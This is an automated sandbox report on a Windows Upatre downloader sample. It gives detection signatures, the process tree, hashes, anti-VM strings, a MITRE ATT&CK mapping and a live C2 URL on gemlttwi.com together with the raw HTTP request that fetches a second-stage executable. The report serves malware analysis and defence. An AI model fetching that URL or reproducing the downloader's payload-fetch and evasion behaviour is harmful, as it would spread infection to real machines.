Edit tour

Windows Analysis Report
v6DLIositV.exe

Overview

General Information

Sample Name:	v6DLIositV.exe
Original Sample Name:	2023-02-17_9de48e7cfc2bc56631387e527f859efd_cryptolocker.exe
Analysis ID:	810502
MD5:	9de48e7cfc2bc56631387e527f859efd
SHA1:	959b863e84103132f89a10a7fd6981771881f763
SHA256:	215c37360388d16653ffc1740c639d486753a9db69a8ad4f3e1b172b1b712df4
Tags:	exe
Infos:

Detection

Upatre

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Yara detected Upatre

Multi AV Scanner detection for submitted file

Detected unpacking (changes PE section rights)

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Antivirus detection for URL or domain

Detected unpacking (overwrites its own PE header)

Antivirus detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Creates a DirectInput object (often for capturing keystrokes)

Uses 32bit PE files

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Drops PE files

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found evasive API chain (may stop execution after checking a module file name)

JA3 SSL client fingerprint seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

v6DLIositV.exe (PID: 2952 cmdline: C:\Users\user\Desktop\v6DLIositV.exe MD5: 9DE48E7CFC2BC56631387E527F859EFD)

hurok.exe (PID: 5104 cmdline: "C:\Users\user\AppData\Local\Temp\hurok.exe" MD5: 9313C9760ABEE035167EC3A7CC743EB2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Upatre	Upatre is primarly a downloader. It has been discovered in 2013 and since that time it has been widely updated. Upatre is responsible for delivering further malware to the victims, in specific upatre was a prolific delivery mechanism for Gameover P2P in 2013-2014 and then for Dyre in 2015.	No Attribution	https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/ https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/ https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/ https://secrary.com/ReversingMalware/Upatre/	https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre

Malware Configuration

Threatname: Upatre

{"C2 urls": "gemlttwi.com/tech/2mr.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.303571500.00000000005B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
00000000.00000002.306318619.0000000000401000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
00000001.00000003.305686991.0000000002060000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
00000001.00000002.314199017.0000000000401000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Upatre	Yara detected Upatre	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.v6DLIositV.exe.400000.0.unpack	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
0.3.v6DLIositV.exe.5b08e7.0.raw.unpack	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
1.3.hurok.exe.20608e7.0.raw.unpack	JoeSecurity_Upatre	Yara detected Upatre	Joe Security
1.2.hurok.exe.400000.0.unpack	JoeSecurity_Upatre	Yara detected Upatre	Joe Security

Snort Signatures

ET TROJAN Downloader (P2P Zeus dropper UA) - Source IP: 192.168.2.4 - Destination IP: 192.185.35.56

Timestamp:	192.168.2.4192.185.35.56496964432017726 02/17/23-06:19:57.094300
SID:	2017726
Source Port:	49696
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Feb 2023 05:19:57 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://gemlttwi.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8

Source: Amcache.hve.1.dr

String found in binary or memory: http://upx.sf.net

Source: unknown

DNS traffic detected: queries for: gemlttwi.com

Source: C:\Users\user\Desktop\v6DLIositV.exe

Code function: 0_2_00401020 EntryPoint,GetModuleHandleW,ExitProcess,HeapCreate,HeapAlloc,RtlAllocateHeap,HeapAlloc,GetModuleFileNameW,GetTempPathW,wsprintfW,CreateFileW,GetFileSize,lstrlenW,lstrlenW,RtlAllocateHeap,ReadFile,lstrcmpW,lstrlenW,EntryPoint,CreateFileW,lstrlenW,WriteFile,CloseHandle,FindCloseChangeNotification,CloseHandle,GetTempPathW,ShellExecuteW,CloseHandle,DeleteFileW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,InternetQueryOptionW,InternetSetOptionW,HttpSendRequestW,HttpQueryInfoW,HeapAlloc,InternetReadFile,CreateFileW,WriteFile,CloseHandle,GetCurrentDirectoryW,wsprintfW,

0_2_00401020

Source: global traffic

HTTP traffic detected: GET /tech/2mr.exe HTTP/1.1Accept: text/*, application/*User-Agent: Updates downloaderHost: gemlttwi.comCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 192.185.35.56:443 -> 192.168.2.4:49696 version: TLS 1.2

Source: v6DLIositV.exe, 00000000.00000002.306382852.00000000006EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected Upatre

Source: Yara match	File source: 0.2.v6DLIositV.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.v6DLIositV.exe.5b08e7.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.hurok.exe.20608e7.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.hurok.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.303571500.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.306318619.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.305686991.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.314199017.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

Source: v6DLIositV.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: v6DLIositV.exe

Virustotal: Detection: 85%

Source: C:\Users\user\Desktop\v6DLIositV.exe

File read: C:\Users\user\Desktop\v6DLIositV.exe

Jump to behavior

Source: v6DLIositV.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\v6DLIositV.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\v6DLIositV.exe C:\Users\user\Desktop\v6DLIositV.exe
Source: C:\Users\user\Desktop\v6DLIositV.exe	Process created: C:\Users\user\AppData\Local\Temp\hurok.exe "C:\Users\user\AppData\Local\Temp\hurok.exe"
Source: C:\Users\user\Desktop\v6DLIositV.exe	Process created: C:\Users\user\AppData\Local\Temp\hurok.exe "C:\Users\user\AppData\Local\Temp\hurok.exe"	Jump to behavior

Source: C:\Users\user\Desktop\v6DLIositV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\v6DLIositV.exe

File created: C:\Users\user\AppData\Local\Temp\hurok.exe

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/2@1/1

Source: C:\Users\user\Desktop\v6DLIositV.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\hurok.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hurok.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\v6DLIositV.exe	Unpacked PE file: 0.2.v6DLIositV.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\hurok.exe	Unpacked PE file: 1.2.hurok.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\v6DLIositV.exe	Unpacked PE file: 0.2.v6DLIositV.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\hurok.exe	Unpacked PE file: 1.2.hurok.exe.400000.0.unpack

Source: C:\Users\user\Desktop\v6DLIositV.exe	Code function: 0_2_005A1390 push es; retn 0000h		0_2_005A138D
Source: C:\Users\user\Desktop\v6DLIositV.exe	Code function: 0_2_005A1020 push F4DCDDAAh; ret		0_2_005A1039

Source: C:\Users\user\Desktop\v6DLIositV.exe

File created: C:\Users\user\AppData\Local\Temp\hurok.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: 1.png

Source: C:\Users\user\Desktop\v6DLIositV.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hurok.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Users\user\Desktop\v6DLIositV.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-632

Source: Amcache.hve.1.dr	Binary or memory string: VMware
Source: Amcache.hve.1.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.1.dr	Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.1.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.1.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.1.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Users\user\Desktop\v6DLIositV.exe

Code function: 0_2_005A0572 mov eax, dword ptr fs:[00000030h]

0_2_005A0572

Source: C:\Users\user\Desktop\v6DLIositV.exe

Process created: C:\Users\user\AppData\Local\Temp\hurok.exe "C:\Users\user\AppData\Local\Temp\hurok.exe"

Jump to behavior

Source: Amcache.hve.1.dr

Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	11 Process Injection	1 Masquerading	1 Input Capture	11 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	11 Process Injection	LSASS Memory	1 Remote System Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	21 Software Packing	NTDS	1 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
v6DLIositV.exe	86%	Virustotal		Browse
v6DLIositV.exe	100%	Avira	TR/Agent.AGY.4
v6DLIositV.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\hurok.exe	100%	Avira	TR/Agent.AGY.4
C:\Users\user\AppData\Local\Temp\hurok.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.hurok.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1207387	Download File
1.0.hurok.exe.400000.0.unpack	100%	Avira	TR/Agent.AGY.4	Download File
0.2.v6DLIositV.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1207387	Download File
0.2.v6DLIositV.exe.21c45b8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.v6DLIositV.exe.400000.0.unpack	100%	Avira	TR/Agent.AGY.4	Download File
1.2.hurok.exe.21845b8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
gemlttwi.com/tech/2mr.exe	100%	Avira URL Cloud	malware
https://gemlttwi.com/tech/2mr.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gemlttwi.com	192.185.35.56	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
gemlttwi.com/tech/2mr.exe	true	Avira URL Cloud: malware	low
https://gemlttwi.com/tech/2mr.exe	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.185.35.56	gemlttwi.com	United States		46606	UNIFIEDLAYER-AS-1US	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	810502
Start date and time:	2023-02-17 06:18:59 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	v6DLIositV.exe
Original Sample Name:	2023-02-17_9de48e7cfc2bc56631387e527f859efd_cryptolocker.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@4/2@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 3.6% (good quality ratio 3.6%) Quality average: 80% Quality standard deviation: 20%
HCA Information:	Successful, ratio: 69% Number of executed functions: 2 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.185.35.56	http://tklglaw.com/wp-admin/Rckx-82YCtgovJY8X1S_OpLmFniQg-lM/	Get hash	malicious	Browse	yoursonosbeam.com/wp-content/QJLA/
	http://supexgroup.co.za/cgi-bin/Mlsh-dpfjJd3vcrZ0bj7_nLHfWDDw-npi/	Get hash	malicious	Browse	yoursonosbeam.com/wp-content/QJLA/
	http://icantwaittomeetyou.com/code/uTTqN-8q1cjF8SVdBBe0_mhRdkpdS-VtW/	Get hash	malicious	Browse	yoursonosbeam.com/wp-content/QJLA/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	162.240.214.202
	PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	162.240.214.202
	https://www.canva.com/design/DAFav33X_c8/uQM_GTz-d92qUYfGtWLG1A/view	Get hash	malicious	Unknown	Browse	192.185.177.26
	Payment 23000 txt.exe	Get hash	malicious	AgentTesla	Browse	192.185.92.210
	DOCUMENT.exe	Get hash	malicious	AgentTesla	Browse	173.254.28.237
	ENQUIRY.exe	Get hash	malicious	GuLoader	Browse	162.241.125.56
	Order Specifications.exe	Get hash	malicious	AgentTesla	Browse	192.185.92.210
	NEW319seyo.elf	Get hash	malicious	Mirai	Browse	162.147.5.231
	qqQ0Uv6ER0.elf	Get hash	malicious	Unknown	Browse	198.154.232.180
	noname.eml	Get hash	malicious	HTMLPhisher	Browse	192.185.85.192
	Fwd bank details.exe	Get hash	malicious	AgentTesla	Browse	162.241.27.28
	file.exe	Get hash	malicious	AgentTesla	Browse	173.254.29.76
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	162.241.233.114
	ALORA-23-038.exe	Get hash	malicious	FormBook	Browse	162.241.194.33
	LZR-VAT. VATIKA - LZR-VAT-001 2023e-I003.exe	Get hash	malicious	FormBook	Browse	162.241.194.33
	inv3884086.htm	Get hash	malicious	HTMLPhisher	Browse	162.241.49.0
	PURCHASE ORDER.exe	Get hash	malicious	AgentTesla	Browse	162.240.214.202
	Invoice (2).exe	Get hash	malicious	AgentTesla, zgRAT	Browse	162.241.27.28
	sora.x86.elf	Get hash	malicious	Mirai	Browse	173.83.209.236
	Proforma Invoice.exe	Get hash	malicious	AgentTesla	Browse	162.240.214.202

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Djvu, Fabookie, SmokeLoader	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-4172.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-8601.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-9945.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	file.exe	Get hash	malicious	DanaBot, Djvu, ManusCrypt, SmokeLoader	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-3759.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-0755.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	RIMESSA_CASSEGNI16022023-3748.xls	Get hash	malicious	Unknown	Browse	192.185.35.56
	file.exe	Get hash	malicious	DanaBot, Djvu, SmokeLoader	Browse	192.185.35.56
	file.exe	Get hash	malicious	Djvu, ManusCrypt, SmokeLoader	Browse	192.185.35.56
	https://sigtn.com/utils/emt.cfm?client_id=4768014&campaign_id=888888&qid=30692089&link=aHR0cHM6Ly9wb21hcnQubGluaz9lPVoyOXlaR0Z1TG5OamFIVnRkMkY1UUdGc1ppNWpiMjA9	Get hash	malicious	Captcha Phish	Browse	192.185.35.56
	file.exe	Get hash	malicious	Djvu, Fabookie, SmokeLoader	Browse	192.185.35.56
	Update (1).js	Get hash	malicious	Unknown	Browse	192.185.35.56
	file.exe	Get hash	malicious	Djvu, SmokeLoader	Browse	192.185.35.56
	Resim Yeni sipari#U015f #U00fcr#U00fcn#U00fc.vbe	Get hash	malicious	Unknown	Browse	192.185.35.56
	PROOF OF TRANSFER.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.35.56
	blah2.htm	Get hash	malicious	HTMLPhisher	Browse	192.185.35.56
	ENQUIRY.exe	Get hash	malicious	GuLoader	Browse	192.185.35.56
	Employee Shared Docs.html	Get hash	malicious	HTMLPhisher	Browse	192.185.35.56
	#Ud83c#Udfb5 Audio Transcription.html	Get hash	malicious	HTMLPhisher	Browse	192.185.35.56

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\hurok.exe

Download File

Process:	C:\Users\user\Desktop\v6DLIositV.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33424
Entropy (8bit):	5.861337940971553
Encrypted:	false
SSDEEP:	768:Kf1K2exg2kBwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZsBGGpNEmK/4B4:o1KhxqwtdgI2MyzNORQtOflIwoHNV2Xs
MD5:	9313C9760ABEE035167EC3A7CC743EB2
SHA1:	579582452DE1C680DF41CB09C5FE8160C310C3D5
SHA-256:	00C4496EA8C2E53AD37E13F5D72FA4CC7F2CEBE7AC4F40840004FD4BFEB292CC
SHA-512:	BE2A99DF3A513FCF5E6EDE225071A60F222CF2D4B09246F298EAC81CC7EDE178C735D840E465AF97EACBBCBFB28046353278E6FBF46E012B5666D2702A20C4C4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0/.^\|.^\|.^\|=.C\|.^\|.^\|S.^\|=..\|.^\|I.Q\|.^\|I..\|.^\|I.>\|h.^\|+..\|.^\|I..\|.^\|Rich.^\|........................PE..L.....KR.................$...@...............@....@..........................................................................J..P....`...+...........................................................................@...............................text....#.......$.................. ..`.rdata.......@.......(..............@..@.data........P.......6..............@....rsrc....+...`...,...8..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\hurok.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.301794090655049
Encrypted:	false
SSDEEP:	12288:JES0Th31T9p6rTSPer9W31vNwBae0NhX21KHHNYmDbrSPV7IRO:KS0Th31T9pWTSPt/wu
MD5:	88405DBD61439FB500A4AD1F57567019
SHA1:	942268B4BA99805BE54C75F8437307254310DF5C
SHA-256:	5E050599E346599A8CF1ABA2D54AA29ADE24D9B1E5CAA3937696194A31341809
SHA-512:	36E447E8CCB6EB6079B3FBBAA1E877E62579658EE0F69BD29F6F2E02FEB79B0B46FC4D0732BD04D9FBB483673E6C3E0B130F950CAC90EDF248BBD1127536AA43
Malicious:	false
Reputation:	low
Preview:	regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm...y.B................................................................................................................................................................................................................................................................................................................................................$........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.8646093655732265
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	v6DLIositV.exe
File size:	33346
MD5:	9de48e7cfc2bc56631387e527f859efd
SHA1:	959b863e84103132f89a10a7fd6981771881f763
SHA256:	215c37360388d16653ffc1740c639d486753a9db69a8ad4f3e1b172b1b712df4
SHA512:	0f899f44536b651b97204dd876013796c6835d0562d04c479ba3b73032ab15edc8307f9f2d96057a673a5f12be16e85a084dc73e6c76b73f8646e8f354bea2f7
SSDEEP:	768:Kf1K2exg2kBwtdgI2MyzNORQtOflIwoHNV2XBFV72BOlA7ZsBGGpNEmK/4BM:o1KhxqwtdgI2MyzNORQtOflIwoHNV2Xo
TLSH:	1BE27573AFC515D1E673AAB3F8F792C1D627BD295932850E108A3F4446F3680EDA1D0A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0/..^\|..^\|..^\|=.C\|..^\|..^\|S.^\|=..\|..^\|I.Q\|..^\|I..\|..^\|I.>\|h.^\|+..\|..^\|I..\|..^\|Rich..^\|........................PE..L.....KR...

File Icon


Icon Hash:	68ccccc8c88cc4d8

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x524BD5AC [Wed Oct 2 08:13:32 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	db206e36db5c9492ce02c61a679129e2

Entrypoint Preview

Instruction
call 00007F5704DB41A0h
call 00007F5704DB3F71h
adc dword ptr [eax+00h], eax
mov fs, word ptr [eax+eax*2]
add byte ptr [esi+28h], dh
inc eax
add bh, bh

Rich Headers

Programming Language:

[C++] VS2002 (.NET) build 9466
[ASM] VS2002 (.NET) build 9466
[ASM] VS2003 (.NET) SP1 build 6030
[ C ] VS2003 (.NET) SP1 build 6030
[C++] VS2003 (.NET) SP1 build 6030
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) SP1 build 6030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4af0	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x2b98	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x4000	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23f0	0x2400	False	0.6961805555555556	data	6.268756501132199	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
